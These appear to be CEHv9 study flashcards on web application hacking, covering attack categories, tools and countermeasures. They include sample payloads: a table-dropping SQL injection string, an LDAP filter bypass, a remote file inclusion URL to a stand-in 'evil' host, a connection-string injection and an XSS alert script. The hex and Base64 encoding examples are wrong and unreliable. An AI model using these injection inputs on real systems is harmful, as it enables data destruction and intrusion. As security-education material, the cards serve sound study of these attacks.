CEHv9 MOD12 Hacking Web Applications


Web services vulns: security layer

( WS-security ) -> Parameter tampering, WSDL probing, SQL/LDAP/XPATH/OS command injection, malware injection, brute-forcing, data type mismatch, content spoofing, session tampering, format string, information leakage

Web services vulns: presentation layer

( XML, AJAX, Portal, Other ) -> Parameter tampering, WSDL probing, SQL/LDAP/XPATH/OS command injection, malware injection, brute-force, data type mismatch, content spoofing, session tampering, format string, information leakage

Web services vulns: transport layer

(HTTP, HTTPS, JMS, Other) -> Sniffing, snooping, WS-Routing, Replay attacks, DoS

Web services vulns: access layer

(SOAP, REST) -> Buffer overflow, XML parsing, spoiling schema, complex or recursive payload, DoS, large payload

Web services vulns: discovery layer

(UDDI, WSDL) -> Fault code leaks, permission and access attacks, error leakage, authentication and certification attacks.

Web app security tools

- Acunetix Web Vulnerability Scanner
- Watcher Web Security Tool
- Netsparker
- N-Stalker Web Application Security Scanner
- VampireScan
- dotDefender (WAF)
- ServerDefender VP (WAF)

Injection flaws

- Allow untrusted data to be interpreted and executed as part of a command or query
- These flaws are prevalent in legacy code such as SQL, LDAP, and XPATH queries
- Examples of injection attacks:
-- SQL
-- Command
-- LDAP

Connection Pool DoS

- Attacker examines the connection pooling settings of the application, constructs a large malicious SQL query, and runs multiple queries simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users.

Web services probing attacks

- Attacker traps the WSDL document
- Creates a set of valid requests
- Attacker uses these requests to include malicious content in SOAP requests and analyzes errors to gain a deeper understanding of potential security weaknesses

Web services XML poisoning

- Attackers inject malicious XML code in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors
- Attackers can manipulate XML external entity references that lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks
- XML poisoning enables attackers to cause DoS attacks and compromise confidential information

CAPTCHA Attacks

- Breaching client-side trust
- Manipulating server-side implementation
- Attacking the CAPTCHA image

Web app attack countermeasures: security misconfiguration

- Configure all security mechanisms and turn off all unused devices
- Set up roles, permissions, and accounts, and disable all default accounts or change their default passwords
- Scan for the latest security vulnerabilities and apply the latest security patches

Web Application threats 1

- Cookie poisoning
- Insecure storage
- Information leakage
- Improper error handling
- Broken account management
- Directory traversal
- SQL injection
- Parameter/form tampering
- DoS
- Buffer overflow
- Log tampering
- Unvalidated input
- XSS
- CSRF
- Security misconfiguration
- Broken session management

Web app attack countermeasures: directory traversal

- Define access rights to the protected areas of the website
- Apply checks/hot fixes that prevent the exploitation of the vulnerability, such as Unicode affecting directory traversal
- Apply security patches to the server

Detecting web app firewalls and proxies on target site

- Proxies can be detected by checking whether certain headers have been added to the response header field
- Use the TRACE method of HTTP/1.1 to identify changes made by the proxy server
- To detect a web application firewall, check the cookies in the response to your request; most WAFs add their own cookie in the response

Web app attack countermeasures: cookie/session poisoning

- Do not store plain text or weakly encrypted passwords in a cookie
- Implement cookie timeouts
- Associate a cookie's authentication credentials with an IP address
- Make logout functions available

Web app pen testing

- Done to identify, analyze, and report vulnerabilities
- Involves:
-- Identification of ports
-- Verification of vulnerabilities
-- Remediation of vulnerabilities

Security misconfiguration of web server

- Easy exploitation
- Common prevalence
- An example is when an attacker discovers a standard admin page

Analyze web app: ID server-side functionality

- Examine page source and URLs to make an educated guess about the internal structure and functionality of web applications
- Tools used: GNU Wget, Teleport Pro, BlackWidow

Cookie exploitation: cookie poisoning

- If a cookie contains passwords or session identifiers, an attacker can steal the cookie using techniques such as script injection and eavesdropping
- Attackers then replay the cookie with the same or altered passwords or session IDs to bypass web app authentication
- Attackers can trap cookies using ZAP or Burp Suite

Web app attack countermeasures: insufficient transport layer protection

- Non-SSL pages should be redirected to the SSL page
- Set the 'secure' flag on all sensitive cookies
- Configure the SSL provider to support only strong algorithms
- Ensure the certificate is valid and not expired
- Backend and other connections should use SSL or other encryption technologies

Overall how to defend against web app attacks

- Perform input validation
- Use WAF/IDS
- Keep patches on the server current
- Analyze the source code for SQL injection
- Grant least privileges to accounts accessing data
- Perform dynamic testing and source code analysis
- Disable verbose logging

Web app attack countermeasures: LDAP injection attacks

- Perform type, pattern, and domain value validation on all input data
- Make the LDAP filter as specific as possible
- Validate and restrict the amount of data returned to the user
- Implement tight access control on the data in the LDAP directory
- Perform dynamic testing and source code analysis

Web application threats 2

- Platform exploits
- Insecure direct object references
- Insufficient transport layer protection
- Failure to restrict URL access
- Insecure cryptographic storage
- Cookie snooping
- Obfuscation application
- DMZ protocol attacks
- Security management exploits
- Authentication hijacking
- Network access attacks
- Hidden manipulation
- Unvalidated redirects and forwards
- Session fixation attack
- CAPTCHA attacks

Auth attack: HTTP request tampering

- Query string tampering
-- Looking at the address bar in a browser to identify the string parameter to bypass
- HTTP headers
-- Attackers can modify the Referer header to access protected application functionality

Session management attack

- Session token generation
-- Session token prediction
-- Session token tampering
- Session token handling
-- MITM attack
-- Session replay
-- Session hijacking

Web app attack countermeasures: file injection attacks

- Strongly validate user input
- Consider implementing a chroot jail
- PHP: disable allow_url_fopen and allow_url_include in php.ini
- PHP: ensure that all file and stream functions (stream_*) are carefully vetted

Footprint web server: server discovery

- Whois lookup (IP of web servers)
- DNS interrogation (location and type of servers)
- Port scanning (find services that exist on the server): nmap, NetScanTools Pro, Advanced Port Scanner, hping

DoS Web Attack Examples

- User-registration DoS
- Login attacks
- User enumeration
- Account lockout attacks

How to defend against XSS attacks

- Validate all headers, cookies, query strings, form fields, and hidden fields (i.e. all parameters) against a rigorous specification
- Use a web application firewall to block the execution of malicious scripts
- Encode input and output and filter metacharacters in the input
- Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users
- Use testing tools extensively during the design phase to eliminate XSS holes in the application before it goes into use
- Convert all non-alphanumeric characters to HTML character entities before displaying user input in search engines and forums
- Do not always trust websites that use HTTPS when it comes to XSS
- Develop a standard for signing scripts with private and public keys that actually checks that the script introduced is really authenticated

Webapp Injection attacks/ input validation attacks

- Web script injection
- OS command injection
- SMTP injection
- SQL injection
- LDAP injection
- XPath injection
- Buffer overflow
- Canonicalization

Attacks that can be conducted against Web App Client

- XSS
- Redirection
- HTTP header injection
- CSRF attack
- Session fixation
- Privacy attacks
- ActiveX attacks

XSS Examples

- Malicious script execution
- Redirecting to a malicious server
- Exploiting user privileges
- Ads in hidden IFRAMEs and pop-ups
- Data manipulation
- Session hijacking
- Brute-force password cracking
- Data theft
- Intranet probing
- Key logging and remote monitoring

SQL Injection attacks

- Uses a series of malicious SQL queries to directly manipulate the database
- Bypasses normal security measures
- Can be executed from the address bar
-- Example: " test') ;DROP TABLE messages;--

Guidelines for secure CAPTCHA implementation

1 - Client shouldn't have direct access to the CAPTCHA solution
2 - No CAPTCHA reuse
3 - Use a well-established CAPTCHA implementation
4 - Warp individual letters
5 - Include random letters
6 - Encrypt all communications
7 - Use multiple fonts inside a CAPTCHA

How to defend against web services attack

1 - Configure WSDL access control permissions
2 - Use document-centric authentication credentials that use SAML
3 - Use multiple security credentials such as X.509 certificates, SAML assertions, and WS-Security
4 - Deploy web services with capable firewalls
5 - Configure firewalls/IDS systems
6 - Configure firewalls/IDS systems to filter improper SOAP and XML syntax
7 - Implement centralized inline requests and responses
8 - Block external references
9 - Maintain and update a secure repository of XML schemas

How to defend against DoS attack

1 - Configure the firewall to deny external ICMP traffic access
2 - Secure remote administration and connectivity testing
3 - Prevent use of unnecessary functions such as gets and strcpy, and prevent return addresses from being overwritten
4 - Prevent sensitive information from being overwritten
5 - Perform thorough input validation
6 - Data supplied by the attacker should be stopped from being executed

Web App Hacking Methodology

1 - Footprint web infrastructure
2 - Attack web servers
3 - Analyze web applications
4 - Attack authentication mechanism
5 - Attack authorization schemes
6 - Attack session management mechanism
7 - Perform injection attacks
8 - Attack data connectivity
9 - Attack web app client
10 - Attack web services

How to defend against SQL injection attacks

1 - Limit the length of user input
2 - Use custom error messages
3 - Monitor DB traffic using an IDS, WAF
4 - Disable commands like xp_cmdshell
5 - Isolate the database server and web server
6 - Always use the method attribute set to POST and a low-privileged account for the DB connection
7 - Run the database service account with minimal rights
8 - Move extended stored procedures to an isolated server
9 - Use typesafe variables or functions such as IsNumeric() to ensure type safety
10 - Validate and sanitize user inputs passed to the database

Hacking web servers

1 - Scan the server for known vulnerabilities
2 - Launch web server attack
3 - Launch DoS against the web server
Common tools used:
- URLScan
- Nikto (!!!!!)
- Nessus
- Acunetix Web Vulnerability Scanner
- WebInspect

How to defend against command injection flaws

1 - Perform input validation
2 - Escape dangerous characters
3 - Use language-specific libraries that avoid problems due to shell commands
4 - Perform input and output encoding
5 - Use a safe API which avoids the use of the interpreter entirely
6 - Structure requests so that all supplied parameters are treated as data, rather than potentially executable content
7 - Use parameterized SQL queries
8 - Use modular shell disassociation from the kernel

Footprint web server: service discovery

1 - Scan the target web server for common ports
2 - Tools to use: nmap, NetScanTools Pro, Sandcat Browser
3 - Identified services act as attack paths for web application hacking

Session attacks: Session ID Prediction/Brute-forcing

1 - Collect some valid session ID values by sniffing traffic
2 - Analyze captured session IDs
3 - Guess valid session IDs
4 - Test different values of the session ID

Analyze web app: ID server-side technologies

1 - Perform detailed server fingerprinting
2 - Examine URLs
3 - Examine the error pages
4 - Examine session tokens

Unicode encoding

- 16-bit: "%u2215"
- UTF-8 (variable-length encoding): "%c2%a9" = copyright symbol

Typical HTTP Services

80 - WWW standard
81 - Alternate WWW
88 - Kerberos
443 - SSL (HTTPS)
900 - IBM WebSphere admin client
2301 - Compaq Insight Manager
2381 - Compaq Insight Manager over SSL
4242 - Microsoft Application Center remote management
7001 - BEA WebLogic
7002 - BEA WebLogic over SSL
8000 - Alternate web server, or web cache
8001 - Alternate web server or management
8005 - Apache Tomcat
9090 - Sun Java Web Server admin module
10000 - Netscape admin interface

What are web 2.0 applications?

A generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration.

Parameter/form tampering

A manipulation of parameters exchanged between client and server such as in the URL.

Directory traversal

Allows attackers to access restricted directories including application source code, configuration, critical system files, and commands outside the root directory.

Web applications provide

An interface between end users and web servers. They are vulnerable to attacks such as SQL injection, cross-site scripting, session hijacking, etc...

Web services attacks

Any web service based on XML services such as WSDL, UDDI, SOAP are vulnerable to many web threats.

Command injection attacks: HTML embedding

Attack used to deface websites using HTML code.

Web services SOAP injection

Attacker injects malicious strings in the user input field to bypass web services authentication mechanism to access back-end databases.

Auth attack: Cookie Parameter Tampering

Attacker traps cookies set by the web application, tampers with their parameters using tools such as ZAP, and replays them to the application.

Web app hacking: attack authentication mechanism

Attackers can exploit design and implementation flaws in web apps, such as failure to check password strength or insecure transportation of credentials, to bypass authentication:
Username enumeration
- Verbose failure messages
- Predictable user names
Cookie exploitation
- Cookie poisoning
- Cookie sniffing
- Cookie replay
Session attacks
- Session prediction
- Session brute-forcing
- Session poisoning
Password attacks
- Password functionality exploits
- Password guessing
- Brute-force attack

Web services footprinting attack

Attackers footprint a web app to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel.

Web services XML injection

Attackers inject XML data and tags into user fields to manipulate XML schema or populate XML databases with bogus entries. Can be used to bypass authorization, escalate privileges, and generate web services DoS attacks.

Broken authentication and session management

Attackers use vulnerabilities in the authentication or session management functions, such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others, to impersonate users. Examples:
- Session ID in URL
- Password exploitation (passwords not encrypted)
- Timeout exploitation (timeout not set properly)

Footprint web infrastructure: server ID/banner grabbing

Banner grabbing:
(HTTP) telnet <website url> 80
(HTTPS) openssl s_client -host <target website> -port 443
then send: GET / HTTP/1.0
Banner grabbing tools: Telnet, Netcat, ID Serve, Netcraft

Web app pen testing framework

- Browser Exploitation Framework (BeEF)
- PowerSploit

Password crackers to use for web apps

Burp Suite, Brutus, SensePost Crowbar

Footprinting web infrastructure: hidden content discovery

Content not reachable from the main visible content but still there.
-- Web spidering (OWASP ZAP, Burp Suite, WebScarab, Mozenda Web Agent Builder)
-- Attacker-directed spidering (done by an intercepting proxy that parses the traffic)
-- Brute forcing (Burp Suite)

Cookie/session poisoning

Cookies are used to maintain session state in the otherwise stateless HTTP protocol. Attacker can modify the cookie content, inject the malicious content, and rewrite session data.

Command injection attacks: Shell injection

Crafts an input string to gain shell access; vulnerable functions include: system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start()

Attacking web app data connectivity

Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries. Different data connectivity attacks: Connection string injection, connection string parameter pollution (CSPP) attacks, and connection pool DoS.

Analyze Web Apps

Done to identify the attack surfaces that it exposes:
- ID entry points for user input (review generated HTTP requests)
- ID server-side functionality (observe the apps revealed to the client)
- ID server-side technologies (use HTTP fingerprinting)
- Map the attack surface (ID various attack surfaces uncovered by the applications)

Analyze web apps: ID entry points for user input

Examine the URL, HTTP headers, query string parameters, POST data, and cookies to determine all user input fields. Identify HTTP header parameters that can be processed by the application as user input, such as the User-Agent, Referer, Accept, Accept-Language, and Host headers. Determine URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL. Tools to use: Burp Suite, httprint, WebScarab, OWASP ZAP

Command injection attack: file injection

Example: http://partyforever.com/vuln.php?color=http://evil/exploit?

Web app DoS attack

Exhausts a server's resources by sending hundreds of resource-intensive requests. Application-level DoS may be more likely to bypass a firewall. Why are applications vulnerable?
- Reasonable use expectations
- Application environment bottlenecks
- Implementation flaws
- Poor data validation

Cross-site scripting attacks

Exploits vulnerabilities in dynamically generated web pages. Occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. An attacker can inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests.

Cross-site request forgery (CSRF) attack

Exploits web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend. This attack begins when a victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects the HTTP request for the trusted site into the victim user's session, compromising its integrity.

Improper error handling

Gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities for launching various web app attacks. Information potentially gathered:
- Null pointer exceptions
- System call failure
- Database unavailable
- Network timeout
- Database information
- Web application logical flow
- Application environment

Hex encoding

Hello = A125C458D8

Footprint web infrastructure step 1

Helps attackers select victims and identify vulnerable web applications.
- Server discovery
- Service discovery
- Server identification
- Hidden content discovery

Connection string parameter pollution (CSPP) attacks

In CSPP attacks, attackers overwrite parameter values in the connection string:
- Hash stealing (a rogue server sees Windows password hashes when clients attempt to connect)
- Port scanning (attacker tries to connect to different ports by changing the value and observing the error messages obtained)
- Hijacking web credentials

Session fixation web attack

In a session fixation attack, the attacker tricks the user into accessing a genuine web server using an explicit session ID value. The attacker then assumes the identity of the victim and exploits the victim's credentials at the server. Can be done through an email link.

Vulnerability Stack

Layer 7 - Custom web applications - business logic flaws, technical vulnerabilities
Layer 6 - 3rd-party components - open source / commercial
Layer 5 - Database - Oracle / MySQL / MS SQL
Layer 4 - Web server - Apache / Microsoft IIS
Layer 3 - Operating system - Windows / Linux / OS X
Layer 2 - Network - router / switch
Layer 1 - Security - IPS / IDS

Buffer overflow web app attack

Occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold. Enables an attacker to modify the target process's address space in order to control process execution, crash the process, and modify internal variables. Attackers modify function pointers to direct program execution through jump or call instructions, pointing them to a location in memory containing malicious code.

Web services Parsing attacks

Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a DoS attack or generate logical errors in web service request processing.
- Recursive payloads: use infinite processing loops to exhaust resources
- Oversize payloads: send a payload that is excessively large to consume all system resources

Insecure cryptographic storage

Refers to when an application relies on poorly written encryption code to encrypt and store sensitive data in the database.

How does LDAP injection work?

Similar to a SQL injection attack but exploits user parameters to generate LDAP query. Example: " juggyboy)(&)) " in the username field with anything in the password field makes the statement true.

SOAP

Simple Object Access Protocol - a protocol specification for exchanging structured information in the implementation of web services in computer networks.

Web service attack tools

SoapUI, XMLSpy, Burp Suite professional, CookieDigger, WebScarab

Insufficient transport layer protection

Supports weak algorithms and uses expired or invalid certificates. An underprivileged SSL setup can also help the attacker launch phishing and MITM attacks. This vulnerability exposes user data to untrusted third parties and can lead to account theft.

Analyze web app: Map the attack surface

Take information and map it to an attack.
Example:
- Info: login vulnerable
- Attack: username enumeration, password brute-force

Connection string injection attack

The attacker injects parameters into a connection string by appending them with the semicolon (;) character.
Before injection: " Data Source = Server, Port; Password=pwd;"
After injection: " Data Source = Server, Port; Password=pwd; Encryption = off"

UDDI

Universal Description, Discovery, and Integration - an XML-based registry for businesses to list themselves on the internet.

Web app attack countermeasures 1 -4

Unvalidated redirects and forwards
- Avoid using redirects and forwards
- Ensure supplied values are valid
Broken authentication and session management
- Use SSL
- Verify user IDs and credentials are stored in hashed form
- Never submit session data as part of GET, POST
Insecure cryptographic storage
- Don't create or use weak cryptographic algorithms
- Generate encryption keys offline
- Ensure data isn't easily decrypted
CSRF
- Clear web history and log off immediately when done
- Don't allow the browser to save login details
- Check the HTTP Referer header

Unvalidated redirects and forwards

Unvalidated redirects enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass. Example: http://vulnweb.com/evil.jsp?fwd=admin.jsp (shouldn't work because user isn't logged in as admin)

Different web service encoding schemes

Web services use many different encoding schemes to safely handle unusual characters and binary data.
URL encoding (converts the URL into ASCII format):
-- "%" followed by the character's two-digit hex ASCII code
--- %3d =
--- %0a new line
--- %20 space
HTML encoding (represents unusual characters):
--- &amp; &
--- &lt; <
--- &gt; >

What is LDAP injection?

Used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching directory services to obtain direct access to databases behind an LDAP tree.

WSDL

Web Services Description Language - an XML format for describing web service connection endpoints.

Attacking web services

Web services work atop the legacy web applications.

Hidden field manipulation attack

When a user makes a selection on an HTML page the selection is typically stored as an HTTP request (GET or POST). Attackers can examine the HTML code of the page for the hidden values in order to change the post requests to the server.

Authorization attack

When attackers manipulate HTTP requests to subvert the application's authorization scheme by modifying input fields that relate to user ID, user name, access group, cost, filenames, file identifiers, etc. Attackers first access the web application using a low-privilege account and then escalate privileges to access protected resources.

Unvalidated input

When input from a client is not validated before being processed by web applications and backend servers.

Base64 encoding

cake = 011000110... Base64 = 011000 110

XSS Website URL example

http://juggyboy.com/<script>alert("WARNING: This is a bad script!");</script>
